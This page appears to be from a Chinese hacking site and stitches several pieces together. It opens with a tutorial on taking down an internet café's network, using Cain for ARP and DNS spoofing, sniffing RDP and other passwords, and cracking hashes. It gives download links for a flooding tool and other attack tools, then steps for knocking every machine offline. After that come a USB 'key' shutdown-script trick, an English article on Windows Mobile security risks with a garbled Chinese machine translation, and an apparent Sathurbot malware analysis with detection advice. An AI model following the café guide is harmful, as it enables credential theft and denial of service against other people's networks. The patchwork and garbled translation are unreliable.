中国骇客云教你如何攻击网吧(压力测试)我们只上传工具。

尊敬的用户大家好,好长时间没有发布教程了。因为前些时候在网吧玩儿,突发奇想的想攻击网吧进行压力测试,【lol网吧】带宽不足是所有网吧的通病。
首先一些网吧进行了安全组建以及安全模块禁用一些arp嗅探等工具。因为缺少相应的dll,所以一些工具是不能用的,在这里我们提供一些基本的补丁,通杀所有网吧32位64位的dll。下载地址复制一下进行浏览器粘贴。
点我进行下载    cain的内网渗透工具,因为下载好以后根据网吧机器是32或者64进行dll的补丁安装。
以下讲解了cain的使用教程,如果大家在使用中不会请看完本文即可进行深度学习。那天我们攻击网吧的截图和照片没有了(怕网管查到所以没有进行拍照不好意思大家。)
这一步不会可以直接进行跳过看下一步:


内网渗透的一些基本工具用法:
Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大,可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。

Abel 是后台服务程序,一般不会用到,我们重点来介绍Cain的使用。

Cain安装:首先我们需要安装Winpcap驱动,

cain内网嗅探工具使用教程 - yes_root - yes_root

一路next便可以安装成功

然后我们就可以使用Cain了,让我们打开传说中的Cain,界面十分简单明了,

cain内网嗅探工具使用教程 - yes_root - yes_root

但是它的功能可就不简单了。

Cain使用:

一、读取缓存密码:切换到“受保护的缓存口令”标签,点上面的那个加号

cain内网嗅探工具使用教程 - yes_root - yes_root

缓存在IE里的密码全都显示出来了。

二、查看网络状况

切换到“网络” 标签,可以清楚的看到当前网络的结构,我还看到内网其他的机器的共享目录,用户和服务,通过上图,我们清楚的看到Smm-DB1开启了IPC$默认共享连接和其他盘隐藏共享。

三、ARP欺骗与嗅探

ARP欺骗的原理是操纵两台主机的ARP缓存表,以改变它们之间的正常通信方向,这种通信注入的结果就是ARP欺骗攻击。ARP欺骗和嗅探是Cain我们用的最多的功能了,切换到“嗅探”标签

cain内网嗅探工具使用教程 - yes_root - yes_root

在这里可以清晰的看到内网中各个机器的IP和MAC地址。

我们首先要对Cain进行配置,先点最单击最上面的“配置”

cain内网嗅探工具使用教程 - yes_root - yes_root

在“嗅探器”中选择要嗅探的网卡,在“ARP(Arp Poison Routing)”中可以伪造IP地址和MAC地址进行欺骗,避免被网管发现

cain内网嗅探工具使用教程 - yes_root - yes_root

在“过滤与端口”中可以设置过滤器,

cain内网嗅探工具使用教程 - yes_root - yes_root

可以根据自己的需要选择过滤的端口,如嗅探远程桌面密码的话,就钩选RDP 3389端口。

小提示:比如我要嗅探上面的61.132.223.10机器,第二个网卡显示我的ip地址为61.132.223.26,和目标机器是同一内网的,就使用第二个的网卡欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

单击网卡的那个标志开始嗅探,旁边的放射性标志则是ARP欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

cain内网嗅探工具使用教程 - yes_root - yes_root

  嗅探了N久之后,点击下面的 “截获密码”, 嗅探所得到的密码会按分类呈现在大家面前,包括http、ftp、VNC、SMTP、ICQ等密码。如果目标主机使用voip电话的话,还可以获得他使用voip电话的录音(恐怖吧),如图

cain内网嗅探工具使用教程 - yes_root - yes_root

  cain内网嗅探工具使用教程 - yes_root - yes_root  下面我们来进行Arp欺骗,点击下面的“ARP”标签, 

cain内网嗅探工具使用教程 - yes_root - yes_root

 在右边的空白处单击,然后点上面的“加号”,出现“新建ARP欺骗”对话框,在左边选网关,右边选择被欺骗的IP。

这里要注意的是,你的机器性能比网关差的话,会引起被欺骗机器变慢。

1.DNS欺骗:

在“DNS欺骗”中填入请求的DNS名称和响应包的IP地址,

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,当目标地址访问www.hao123.com的时候就自动跳转到Www.google.cn的网站上面,其中的“#resp. 欺骗”就是目标主机被欺骗的次数。

这样对于目标机器进行挂马也不失为一种绝妙的方法。点上面的放射性标志开始Arp欺骗,

小提示:网关IP可以在命令行下输入ipconfig获得

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,网关IP为61.132.223.4

2.远程桌面欺骗:

Cain能够实行中间人攻击(Man-In-The-Middle)远程计算机的终端服务协议(Remote Desktop Protocol RDP)进行截获和解密工作。也就是截获目标主机的3389登陆密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

在“ARP-RDP”里已经得到了3个数据包。右击右边得到的数据包,选择“查看”,

cain内网嗅探工具使用教程 - yes_root - yes_root

我的运气比较好,获得了目标主机登陆3389的用户和密码,如图,用户名为“administrator”密码为“asdf1234”。

小技巧:在肉鸡上对密码进行嗅探的时候,可以按Alt +Delete对界面进行隐藏,按Alt + Page Down隐藏都任务栏,按Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用!

四、密码的破解

Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文,我这里示范如何使用Cain破解md5密文。

cain内网嗅探工具使用教程 - yes_root - yes_root

切换到“破解器”标签,在右边空白处单击,按上面的加号,输入我们要解密的32位密文

cain内网嗅探工具使用教程 - yes_root - yes_root

右击要破解的密文,选择“暴力破解”,选择口令长度和密码范围,我这儿选择的是5到6位纯数字密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

按“开始”进行破解

cain内网嗅探工具使用教程 - yes_root - yes_root

一会儿工夫,破解出的密码就出现在我们面前了,哈哈,密码是123456。除了暴力破解以外,你还可以使用通过字典破解和通过rainbow表进行破解。

其他还有一些常用密码的读取可以参照下图

cain内网嗅探工具使用教程 - yes_root - yes_root

使用十分简单,大家自己研究下就行了,密文计算器的效果如图:

cain内网嗅探工具使用教程 - yes_root - yes_root

可以对密文进行md2,md5,lm,nt等方式进行加密

五、追踪路由

切换到“追踪路由”标签,在目标主机中填入目标主机的ip或者域名,我这填www.hackerxfiles.net

cain内网嗅探工具使用教程 - yes_root - yes_root

选择协议和端口,点“开始”,一杯咖啡过后,就可以清晰的看到访问黑X  BBS所经过的所有服务器IP、访问所需的时间和主机名。

另外,Cain还具有“LSA分析”和“嗅探无线网络”等功能,这些功能我们不经常用到,感兴趣的朋友可以自行研究。最新版本cain4.92已经加入vista支持,但是“读取读取缓存密码”功能不是很稳定,如果要读取读取缓存密码的话请使用以前的版本。最后要说一句:Cain的确是一款绝佳的黑界利器,威力无穷,请各位小黑们谨慎使用。


第二步:下载网络超级邻居和p2p网络终结者。
网络超级邻居可以检测内网所有上线主机与共享主机,并且可以进行开放端口检测与服务器主机的检测,具体参考我们的网络超级邻居的使用方法如下:
打开网络超级邻居直接嗅探整个网吧的上线主机,扫描开放端口,135.3389.1433等端口…搜索开放端口的在线主机,共享本机到所有开放主机文件等。
p2p网络终结者可以在百度任意下载,如果缺少部分dll可以添加cain的dll进行安装和使用。
因为网络超级邻居和p2p网络终结者cain的共同性,都可以进行局域网扫描,所以这个就得看个人经验找到相应的服务器主机和安全模块的服务器主机地址了。这里可以使用三个进行经验判断和扫描结果。以后有图了给大家补下。
网络超级邻居下载地址:http://www.crsky.com/soft/2700.html

p2p网络终结者下载地址:http://www.cr173.com/soft/1953.html
因为
这里个软件百度随便一个下载站点都可以下载到,所以如果上面两个软件失效了,请百度一下吧。


第三步:蜗牛攻击器终极版下载地址:https://binghesoft.ctfile.com/file/117068576    这个如果不能使用,百度一下(蜗牛攻击器终极版)|


第四步:打开蜗牛攻击器,p2p网络终结者,网络超级邻居。
蜗牛攻击器输入攻击目标主机:192.168.xxx.xxx
增加蜗牛
切记不要使自己的机器卡死,增加4到5个都可以,模式自己搞。
p2p网络终结者全局控制,黑名单。起到了一定的arp的效果。但不是欺骗。
cain去嗅探主机的账户密码。【这一步不会的话可以使用上面几步】


第五步:等7到8分钟整个网吧会掉线,这里的cain其实没有起到多大的作用,说这个是为了网大家去嗅探一些简单的局域网密码算是一种爆破工具吧~内网扫描工具等。


如果网吧不掉线:两台机器同时攻击.直接秒死…经过测试所有网吧都可以进行秒杀,因为网吧的安全问题和带宽的响应问题..导致网吧直接秒死是正常的………..之前去了网吧做测试..所以没有敢拍照和录像..有机会一定弄,不会的关注我们官方公众微信,进行留言,我们会有专门的客服教你喔~~~

中国骇客云教你使用U盘制作进入系统的中钥匙

如今U盘容量越来越大而且价钱越来越低,因而普及率十分之高,置信大家们也动手一个。想不想用U盘作爲开启XP大门的钥匙来维护你的爱机呢?这样他人就会由于没有对应的U盘钥匙而无法开机,平安性自是大爲进步。制造办法十分复杂,也不需第三方软件,只是应用XP本身的工具一组战略,只需3步走。

第一步:先把U盘插上,然后双击翻开“我的电脑”,检查一下本人U盘在Windows XP中

所分配的盘符,我的盘符爲K,将恣意一团体文件复制到U盘的根目录中,我把一个照片放到了外面名字爲“U.JPG”。

第二步:翻开Windows XP的记事本顺序,输出一条命令:if not exist K:\u.jpg shutdown -s -f -t

3 -c”Sorry,你不是本机主人,回绝开机!”

W~$VUM7PH}NBEX_Z@OWH1_N.jpg

其中的“shutdown”既爲关机命令,“-s”爲关机的参数,“-r”爲重启,“-f”爲强迫关机,“-t”后门跟的是倒计时3秒,“-c”提示的关机阐明。本命令的意思是:假如在K盘上我不到“U.jpg”这个文件的话,就显示”Sorry,你不是本机主人,回绝开机!”,之后过3秒就自动关机。当然,假如你在第一步中复制的是“HackerXfiles.mp3”MP3文件也行,只需在相应的命令行中修正一下就可以了。然后将文本另存爲“Check.bat”。将寄存途径定位于Windows XP’的零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup中(由于GroupPolicy文件夹默许爲隐藏,请先在“文件夹选项”中将其显示,文件的扩展名改爲bat

型,文件名可恣意改,如hackXfiles.bat。

第三步:翻开命令符,间接按Win+R,在外面输出“gpedit.msc”。找到“本地计算机”战略——“计算机配置”——“Windows设置”——“脚本(启动/关机)”,然后双击右侧中的“启动”项;在弹出的“启动属性”窗口中单击“添加”按钮,然后在弹出的“添加脚本”窗口中单击“旅游”按钮,Windows XP会自动定位于零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup文件夹,单击迭中刚生成的Check.bat批处置文件后在单击“翻开”按钮;之后单击一次“启动”窗口中的“确定”按钮,最初封闭组战略窗口。

OK,一把完满的U盘钥匙曾经打造出来了,只需再启动XP之前将U盘插到主机上。等运转脚本时分会判别能否存在文件“U.JPG”,假如没有发现文件就会3秒后强迫关机,拿起手中的U盘赶快试一下吧!

The Dangers of the Windows Mobile Phone HACKERSCHINA

Introduction and Overview of the Last Article

Our last article examined in greater detail the threats that are posed to the iOS Operating System, which in turn affects all of the wireless devices, which primarily include those of the iPhone and the iPad.

There is often this feeling of safety when using these devices. The major part of this reasoning is that in reality, Apple has not been afflicted as much with Cyber-attacks as much as the Samsung and the Windows mobile devices have been.

Security experts have noted that Apple goes to extraordinary lengths to ensure that their devices are as hacker proof as possible. For example, there are extremely rigorous Quality Control processes in place, as well as other systems of checks and balances to ensure that only the authorized end user is accessing his or her own iPhone or iPad.

To this extent, Apple has even introduced the use of Biometric Technology to provide a Two-Factor (also known as “2FA”) security approach. This can also be thought of as a “Multi-Modal” approach as well. Really, any Biometric could work in this regard, but Apple chose to make use of Fingerprint Recognition because not only of its strong levels of Ease of Use but also it is the most widely accepted Biometric Technology worldwide.

This push by Apple only came to fruition after it bought a Biometrics Vendor known as “Authentic” in a Merger and Acquisition (M&A) activity. At the time, Authentec was the premier provider of Fingerprint Recognition Sensors to the Biometrics industry, with a specialty in manufacturing Optical based Sensors.

In fact, this same technology is even being used in the “Apple Pay,” which is basically Apple’s version of the Mobile Wallet. This and the use of Biometric Technology in the Smartphone will be topics of separate articles in the future.

However, as our last two articles have shown, Apple can be just as prone to Cyber-attacks as well. The first article looked at uploading rogue mobile applications onto the App Store by manipulating the Digital Certificates, which are granted to an end user after they have created an account for themselves. The second article examined other Cyber based attacks, which include the following:

  1. A Malicious Configuration Profile:

    Most wireless devices consist of this file for it to make the end user to properly set up their Apple wireless device correctly the first time quickly and easily. However, the Cyber attacker has found a way in which to create a malicious Configuration Profile and inject that into the iPhone or the iPad.

  2. The WebKit Vulnerability:

    This is a software package, which is used to power the Safari Web Browser. In fact, Apple is not just using it; Google in their Chrome Web Browser is also using it. However, despite the efforts to safeguard this package, the Cyber attacker has found ways in which to inject malicious .exe files into it, with the end result being that the end user is redirected to a spoofed Website.

  3. The Zero Day Attack:

    In these situations, the Cyber attacker has advanced knowledge of a weakness or a vulnerability in the Source Code and takes full advantage of it before the Vendor even knows about it.

In this article, we continue with the theme of Security threats, which are posed to Smartphones-but this time, the focal point is on the Windows Mobile devices.

The Windows Mobile Operating System

Yes, we have all heard of the Windows Operating Systems. By far, it is the most widely used OS in the world, ranging from the Workstation to the Server editions. These have ranged all the way from Windows 95 to Windows XP to Windows Vista to the latest version now, which is running, Windows 10.

When compared to just about any other software application or OS (including even the Open Source ones such as that of Linux), Windows has been the most sought after prize of the Cyber attacker.

For example, just about every piece Malware, Spyware, Adware, and even Trojan Horse has found its way into it. However, unlike the other Wireless Vendors that have made a separate and unique Operating System for their Smartphone product lines, Microsoft took an entirely different approach, utilized their existing Operating Systems, and modified so that it would be the OS for their mobile phone line.

For example, since the latest version is Windows 10, Microsoft simply took the underlying Source Code of that and modified it fit their Smartphone models, and rebranding it as merely “Windows 10 Mobile”. This Operating System is now available on the Lumia line of Smartphones, which include the Lumia 635, the Lumia 730, and the Lumia 830.

Microsoft’s fundamental reason for taking this approach is that it wanted to “. . . share many of the same features as its desktop version, including the same kernel, UI elements, menus, Settings, and even Cortana.” (SOURCE: 1).

But however, there is one fatal flaw in taking this kind of approach: The same type of Cyber threats and risks which are posed to the Windows Operating Systems on the Workstations and Servers can also be used to manipulate the OS’s which reside on the Windows line of Smartphones.

Therefore, on a theoretical plane, the effects of one Cyber-attack on a Windows platform will thus be greatly proliferated onto the mobile devices, and vice versa.

TheRisksPosed to the Windows Mobile Operating System

ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

  1. Making Network based Files and Shared Resources available to everybody:

    Although the Windows 10 Operating System has put in extra safeguards to protect private and confidential files of businesses/corporations and even the end user, the rights, which are granted to access them, seem to be misconfigured at times, and this is an escalating trend that is of grave concern. This can happen for a wide myriad of reasons, such as employees who really do not know how to assign permissions properly, or even the Network/System Administrators who are so overloaded in their work that he or she does not double check the permissions that they grant. However, more often than not, it is also the work of the Cyber attacker who is also misconfiguring these specific rights and permissions as well. What is interesting about this trend is that the Cyber attacker is not out for personal gain in these matters; rather their main intent is to cause financial loss to a business or a corporation when their files and resources become available to the public at large. This type of attack is especially worrisome on the Windows Mobile devices, as many employees now use this tool to store both personal and work related files, as literally millions of wireless devices can fall victim in just a matter of minutes. It should be noted that the primary target in this kind of attack is in exposing the “Everyone Group” directory in the Windows 10 Operating System.

  2. Lack of Enablement of the Personal Firewall:

    As it was described in the last article, Apple develops a specific Configuration File for the end user to set up their iPhone properly. A major component of this is also making sure that the Security features have been enabled as well. This even includes the Personal Firewall. In sharp contrast, although the Windows 10 Operating System does have a feature related to the Apple Configuration File, the Security features which come on it are not all preset. In other words, the end user has to configure all of this themselves manually. Even though Windows 10 has a highly GUI centered approach for doing this both on the workstation and Mobile Device, it can still be very confusing if not daunting for the end user to configure the Security features and the Personal Firewall properly. As a result, they often give up, thus making their Wireless device that much more prone to a Malware or Spyware Attack. But on the flip side, the Personal Firewall on the Windows 10 OS has been deemed to be a powerful to use, such as when it comes to protecting the IPC$ and ADMIN$ share files. It has also been known to block out effectively any type or kind of Wireless Intrusion Attacks.

  3. Unaccounted for Systems which are running in the background:

    Because the Windows 10 Operating System is deemed to be in some ways “bloated” because of its Closed Source platform, there is one Security weakness it possesses that can affect both the workstation and the mobile devices: It’s lack of accounting for those resources which run in the background. What this means essentially is that the OS may not even be “aware” at times of the services and other related software applications which are running in the background. This very often includes the Internet Information Services (also known as the “IIS”-this is the Web Server software) and the SQL Server Express (this is the free and “watered down” version of the SQL Server Database). Because of this lack of unaccountability, a Cyber attacker can take advantage of this very quickly, and insert a malicious payload, which can spread itself very quickly.

  4. There are no minimum Security Thresholds or Standards which have been established:

    As described, although the Windows 10 Operating System does indeed come with a robust set of Security features, there is still another area in which it is severely lacking –a lack of Best Standards for the businesses and corporations to adopt which make use of this OS on their Windows Mobile devices. Because of this, the IT Staff at many organizations are often left to their own guises to experiment which Security features of Windows 10 are needed and those that are needed to come into compliance with the Security Policies, which have been set forth and established. As a result, there can be significant periods of when the “Security guard is let down,” thus making a very fertile time period for the Cyber attacker to launch a wide-scale attack upon the organization.

  5. The Windows 10 for Mobile Phones cannot be tested using the traditional tools:

    Sure, the Windows 10 OS can be tested to make sure that it does indeed come into compliance with the Security requirement and needs of the business entity. However, since this is the latest version from Microsoft, it requires the latest tools to test. The companies with the bigger budgets could probably afford to have these tools, and perhaps even hire top of the line Penetration Testers. Nevertheless, the truth of the reality is that many of the smaller to medium-sized businesses cannot afford this, and as a result, are forced to test their Windows Mobile with outdated testing tools. This leads to incomplete and very often inaccurate results, which will make the Windows Mobile device that much more vulnerable to a Cyber based attack. Another problem compounding this issue is that Windows 10 is based on a Closed Source platform (just like the older OS versions and other Microsoft products), so trying to conduct a Penetration Test on the Source Code is very difficult, if not impossible, to accomplish.

  6. Automated Updates and Patches:

    Windows 10 is notorious for this feature. It often occurs at the most inconvenient times. Although the primary intention of this is to keep the Windows Mobile device up to date with the latest Security Patches, there is a chance that one of those updates could very well be a rogue application (such as a Malware or a Spyware) inserted into the process by a sophisticated Cyber attacker. Unfortunately, there is no way of knowing of this until it is too late. For instance, the Windows 10 OS will only notify you which specific updates and/or patches have been installed after the fact.

Conclusions

In summary, this article has examined the Security threats and risks which are posed to the primarily to the Windows 10 Operating System (OS). As it was discussed earlier, this OS is not only available for the workstation and PCs, but it has also been modified and restructured in such a way by Microsoft that it is also available on their Windows Mobile phone product line as well.

Although this might have proven to be an effective strategy regarding cost savings, it also presents a double-edged sword when it comes to Security: For instance, the same threats, which are inherent to the workstation and PC versions, are also targeted to the mobile phone versions of the Windows 10 OS.

Thus far, in this series, we have examined the Security Vulnerabilities to all three major mobile phone OSs:

  1. The iOS
  2. The Android OS
  3. The Windows 10 Mobile OS.

A future article will examine how an end user, or even a business entity, can take preventative steps to make sure that their Smartphone does not become the target for a Cyber based attack. Our next article will focus on another Security concept of the Smartphone – “Jailbreaking.”

文章的最后检查更详细,对iOS操作系统的威胁,这反过来又影响了所有的无线设备,它主要包括iPhone和iPad。

经常会有这种安全感的时候使用这些设备。这个推理的重要组成部分,在现实中,苹果并未受到尽可能多的网络攻击一样,三星和Windows Mobile设备已。

安全专家指出,苹果正在竭尽全力确保他们的设备是为防黑客可能。例如,有在地方非常严格的质量控制流程,以及其他的制衡系统,确保只有授权的用户访问他或她自己的iPhone或iPad。

在这个意义上,苹果还介绍了生物识别技术提供一二的使用系数(也被称为“2fa”)的安全方法。这也可以看作是一个“多模态”的方法以及。真的,任何生物能够在这方面的工作,但苹果采用指纹识别不仅因为其强大的水平的易用性也是最被广泛接受的生物技术世界。

这推动苹果只实现了之后就买了一个生物识别厂商称为“正宗”,在合并和收购(M&A)活动。当时,AuthenTec是指纹识别传感器的生物识别行业的领先供应商,在制造光学传感器专业。

事实上,这一技术甚至被用在“苹果支付,“这基本上是苹果版的移动钱包。这和生物识别技术在智能手机的使用将是未来独立的文章主题。

然而,当我们最后的两篇文章显示,苹果就可以容易的网络攻击以及。第一篇看着上传流氓的移动应用程序到应用程序商店通过操纵数字证书,并授予最终用户在他们为自己创造了一个账户。第二条审查其他基于网络的攻击,包括:

  1. A:恶意配置剖面

    大多数无线设备包括这个文件,它使最终用户正确设置他们的苹果无线设备正确的第一时间快速和容易。然而,网络攻击者已经发现了一种创建一个恶意配置文件注入到iPhone或iPad。

  2. WebKit漏洞:

    这是一个软件包,它是用来发电的Safari浏览器。事实上,苹果不仅仅是使用;谷歌的Chrome浏览器也使用它。然而,尽管维护这个包的努力,网络攻击者已经发现如何在其中注入恶意。exe文件到它,其结果,最终用户将被重定向到一个假冒的网站。

  3. 零日攻击:

    在这种情况下,网络攻击者有一个弱点或源代码中的一个漏洞,先进的知识和充分利用它之前,供应商甚至知道它。

在这篇文章中,我们将继续与安全威胁的主题,是带来的智能手机,但这一次,重点是对Windows移动设备。

Windows Mobile操作系统

是的,我们都听说过Windows操作系统。到目前为止,它是世界上使用最广泛的操作系统,从工作站到服务器版本。这些都为所有的方式从Windows 95到Windows XP到Windows Vista的最新版本,这是运行Windows 10。

相比于任何其他的应用软件或操作系统(甚至包括开源的如Linux),Windows已经是最受欢迎的网络攻击者奖之后。

例如,几乎每一件恶意软件,间谍软件,广告软件,木马,甚至已经到了它。然而,不像其他无线厂商有了自己的智能手机产品线的一个单独的和独特的操作系统,微软采取了一种完全不同的方法,利用他们现有的操作系统,和修改,这将是他们的移动电话操作系统。

例如,由于是最新版本的Windows 10,微软只是把那底层源代码和修改它适合他们的智能手机,并将其命名为仅仅是“Windows 10移动”。该操作系统是目前智能手机Lumia线,包括Lumia 635、Lumia 730和Lumia 830。

微软的根本原因采取这种方法是想”。..分享许多相同的功能,它的桌面版本,包括相同的内核,UI元素,菜单,设置,甚至Cortana。”(来源:1)。

但是,在以这种方法有一个致命的缺陷:网络威胁,这是对Windows操作系统的工作站和服务器的风险同样也可以用来操纵操作系统驻留在智能手机的Windows系。

因此,在理论上,在Windows平台的网络攻击的影响将大大增加到移动设备,反之亦然。

这个风险对Windows Mobile操作系统

道德黑客培训–资源(信息安全)

  1. 使基于网络的文件和共享资源提供给大家:

    虽然Windows 10操作系统已经投入额外的安全措施以保护企业/公司的机密文件,甚至最终用户的权利,这是授予访问它们,似乎是错误的时候,这是一个上升的趋势,严重关注。这可以为各种不同的原因发生,如员工们真的不知道如何分配权限是否正确,甚至网络/系统管理员谁是如此超负荷工作,他或她没有仔细检查权限授予。然而,更多的往往不是,它也是网络攻击者也错误配置这些具体的权利和权限以及工作。这个趋势,有趣的是,网络攻击者是不是出在这些事情上个人利益;而他们的主要意图是导致经济损失的企业或公司在他们的文件和资源提供给广大公众。这种类型的攻击是非常令人担忧的Windows移动设备,许多员工现在使用这个工具来存储个人和工作相关的文件,为数以百万计的无线设备可以牺牲品就是几分钟的事。应该指出的是,在这类攻击的主要目标是在Windows 10操作系统将“每个人组”目录。

  2. 对个人防火墙支持的缺乏:

    因为它是在上一篇文章中描述,苹果为最终用户建立自己的iPhone适当开发一个特定的配置文件。这是一个重要组成部分也确保安全功能已启用,以及。这甚至包括个人防火墙。形成鲜明对比的是,尽管Windows 10操作系统也有一个苹果的配置文件相关的特征,这是它的安全功能是不是所有的预设。换句话说,用户必须配置这一切自己手动。尽管Windows 10有一个高度的GUI为中心的方法,这样做既对工作站和移动设备,它仍然可以非常混乱,如果不畏惧为最终用户配置的安全功能和个人防火墙的正确。因此,他们往往放弃,从而使自己的无线设备,更容易出现恶意软件或间谍软件的攻击。但另一方面,在Windows 10操作系统的个人防火墙已经被认为是一个强大的使用,如当谈到保护IPC$和ADMIN$共享文件。它也被称为阻止了有效的任何类型或无线入侵种。

  3. 下落不明,在后台运行系统:

    由于Windows 10操作系统被认为是在某些方面“臃肿”因其闭源的平台,有一个安全漏洞,它具有可以影响工作站和移动设备:它是在后台运行的资源缺乏,会计。这实际上意味着操作系统甚至可能不“知道”的服务和其他相关的软件应用程序在后台运行的时候。这通常包括Internet信息服务(也被称为“IIS”-这是Web服务器软件)和SQL Server Express(这是免费的,“淡化”版本的SQL Server数据库)。由于缺乏这种不负责任的,网络攻击者可以利用这个非常快,并插入一个恶意的有效载荷,它可以传播很快。

  4. 有没有最低的安全阈值或已建立的标准:

    如前所述,尽管Windows 10操作系统确实有强大的安全功能,还有另一个领域,这是严重缺乏–缺乏最佳标准,采取利用该操作系统的Windows移动设备的企业和公司。因此,IT人员在许多组织往往是留给自己的伪装实验安全功能的Windows 10是被需要的,那些是需要进入安全策略的一致性,并提出了建立。作为一个结果,可以有显着的时期,当“保安是失望,使一个非常肥沃的时间段的网络攻击者发动大规模攻击的组织。

  5. Windows 10的手机无法使用传统工具进行测试:

    当然,10 OS可以测试以保证它确实进入了企业法人的安全要求和需要遵守的窗户。然而,由于这是微软的最新版本,它需要新的工具来测试。与更大的预算的公司可能负担得起这些工具,甚至聘请顶级的渗透测试。然而,现实的事实是,许多小型到中型的企业无法承受,因此被迫要测试他们的Windows Mobile和过时的测试工具。这导致了不完全的和经常不准确的结果,这将使Windows移动设备,更容易受到网络攻击。另一个问题,这个问题是,Windows 10是一个基于开放源代码的平台(就像旧的操作系统版本和其他微软产品),所以要对源代码进行渗透测试是非常困难的,如果不是不可能的,完成。

  6. 自动更新和补丁:

    Windows 10的这个功能是臭名昭著的。它往往发生在最不方便的时候。虽然这主要是保持Windows移动设备是最新的最新的安全补丁,这是一个机会,一个更新的很可能是一个流氓应用程序(如恶意软件或间谍软件)插入的过程中,通过一个复杂的网络攻击。不幸的是,有没有办法知道这个直到为时已晚。例如,Windows 10操作系统只会通知你具体的更新或补丁已经在事实之后安装。

结论

综上所述,本文研究的安全威胁和被提出的主要是针对Windows 10操作系统(OS)的风险。就像前面所讨论的,这种操作系统不仅可用于工作站和个人电脑,但它也被修改,在这样一种方式,通过微软,它也可以在自己的Windows手机产品线以及重组。

虽然这可能被证明是关于节约成本的有效方法,同时还介绍了一把双刃剑,当它涉及到安全性:例如,同样的威胁,这是工作站和PC版本与生俱来的,也有针对性的手机版本的Windows 10操作系统。

到目前为止,在这个系列中,我们已经研究了安全漏洞的所有三个主要的手机OSs:

  1. iOS
  2. Android操作系统
  3. Windows 10移动操作系统。

以后的文章将研究如何最终用户,甚至企业实体,可以采取预防措施来确保他们的智能手机并没有成为一个基于网络的攻击目标。我们的下一篇文章将重点放在智能手机–“越狱的另一个安全的概念。”

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

